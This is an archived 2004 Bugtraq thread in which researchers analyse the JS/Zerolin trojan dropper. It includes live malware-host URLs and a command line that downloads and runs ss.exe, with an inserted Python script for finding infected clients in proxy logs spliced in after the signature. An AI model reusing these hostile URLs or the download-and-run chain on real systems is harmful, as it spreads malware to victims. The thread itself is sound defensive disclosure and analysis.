Message-ID: <653D74053BA6F54A81ED83DCF969DF082D59A8@pivxes1.pivx.com>
Date: Fri, 13 Aug 2004 17:04:58 -0700
From: "Thor Larholm" <tlarholm@...x.com>
To: "T.H. Haymore" <bonk@...chat.chatsystems.com>,
"Nicolas Gregoire" <ngregoire@...probe.com>
Cc: <bugtraq@...urityfocus.com>, <Mark.Amos@...nscorning.com>
Subject: RE: JS/Zerolin
Nicolas was kind enough to provide me with a sample of Zerolin.
Anyone who is even remotely up-to-date with their patches will not be affected by this. At the end of the email is a short piece of encoded JScript code which, when decoded, outputs a hidden iframe that retrieves the following URL:
http://202.99.172.153/link.html
Don't click the link, it is still live.
Following a lot of page breaks is an attempt to exploit the Object Data vulnerability that was fixed by MS03-040. If successful, this launches MSHTA.EXE, which executes the code provided by http://202.99.172.153/link.php, which in turn outputs an embedded file to C:\x.exe, after which it executes the following command:
C:\x.exe http://202.99.172.153/ss.exe
Here are some of the more interesting strings from that file, which suggest Zerolin talks back to index.php on that same IP to notify its owner of a compromised machine:
Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
thor@...x.com
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x4207AEE9
B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9
PivX defines a new genre in Desktop Security: Proactive Threat Mitigation.
<http://www.pivx.com/qwikfix>
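As an added illustration (not code from the thread or from PivX): a small Python triage that reads proxy log lines and grades each client against the chain described above, from the hidden-iframe fetch of link.html, through the link.php payload and the ss.exe download, to the index.php?Client= check-in. The log line format and the sample lines are constructed assumptions; only the host, paths and query parameter come from the analysis.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Chain stages from the analysis, keyed by URL path on the malware host.
C2_HOST = "202.99.172.153"
STAGES = {"/link.html": "iframe", "/link.php": "mshta_payload",
          "/ss.exe": "ss_download", "/index.php": "checkin"}

# Constructed sample log (assumed format: "<ts> <client> <method> <url>").
SAMPLE_LOG = """\
1092441600 10.0.0.5 GET http://202.99.172.153/link.html
1092441601 10.0.0.5 GET http://202.99.172.153/link.php
1092441603 10.0.0.5 GET http://202.99.172.153/ss.exe
1092441640 10.0.0.5 GET http://202.99.172.153/index.php?Client=ABC-123&Name=WKSTN7
1092441700 10.0.0.9 GET http://202.99.172.153/link.html
1092441710 10.0.0.9 GET http://www.example.com/index.php?Client=x
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def classify(url):
    """Return the chain stage a URL belongs to, or None if unrelated."""
    parts = urlsplit(url)
    if parts.hostname != C2_HOST:
        return None
    stage = STAGES.get(parts.path)
    # index.php only counts as the beacon when it carries the Client= parameter.
    if stage == "checkin" and "Client" not in parse_qs(parts.query):
        return None
    return stage


def triage(log_text):
    """Map each client address to a verdict based on the stages it reached."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _, client, _, url = m.groups()
        stage = classify(url)
        if stage:
            seen[client].add(stage)
    verdicts = {}
    for client, stages in seen.items():
        if "checkin" in stages:
            verdicts[client] = "compromised"        # ss.exe ran and phoned home
        elif "ss_download" in stages or "mshta_payload" in stages:
            verdicts[client] = "exploit attempted"  # MS03-040 path was triggered
        else:
            verdicts[client] = "exposed"            # iframe only; host likely patched
    return verdicts
```

Run `triage(SAMPLE_LOG)` to see one compromised client and one that only loaded the iframe; feeding real proxy logs in the same format gives the hosts to pull for a look at C:\x.exe.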
-----Original Message-----
From: T.H. Haymore [mailto:bonk@...chat.chatsystems.com]
Sent: Friday, August 13, 2004 7:51 AM
To: Nicolas Gregoire
Cc: bugtraq@...urityfocus.com; Mark.Amos@...nscorning.com
Subject: Re: JS/Zerolin
On Fri, 13 Aug 2004, Nicolas Gregoire wrote:
Nicolas,
Thanks for the insight. I've received several replies telling me to look at McAfee (yadda-yadda) and other sites. I am well aware of the Zerolin VBS script as I researched it before posting. You've provided what insight I was looking for on the JavaScript side.
Mark, I think this is what we're looking for. Also, keep us updated as to what else you see as this could very well be a new version and they are indeed 'testing'.
Thanks again,
-th
<snip>
> Hi,
>
> I've seen these emails since last Friday, and my gateway has since
> received around 200 of them. KAV and ClamAV detect them as
> "TrojanDropper.VBS.Zerolin"
>
> It appears that a small JScript.Encoded code is hidden at the bottom
> of a false (true?) spam. After several redirections, an ss.exe file
> is downloaded. This file is detected as follows:
>
> KAV : Trojan.Win32.Genme.c
> Trend : not detected
> ClamAV : Trojan.Xebiz.A
> F-Prot : W32/Xebiz.A
> NAI : not detected
>
> Regards,
> --
> Nicolas Gregoire ----- Information Systems Security Consultant
=================================================
Travis
www.cyberabuse.org/crimewatch
Email: Bonk@...tsystems.com | Bonk@...erabuse.org
=================================================
/"\
\ /
X ASCII Ribbon Campaign
/ \ Against HTML Email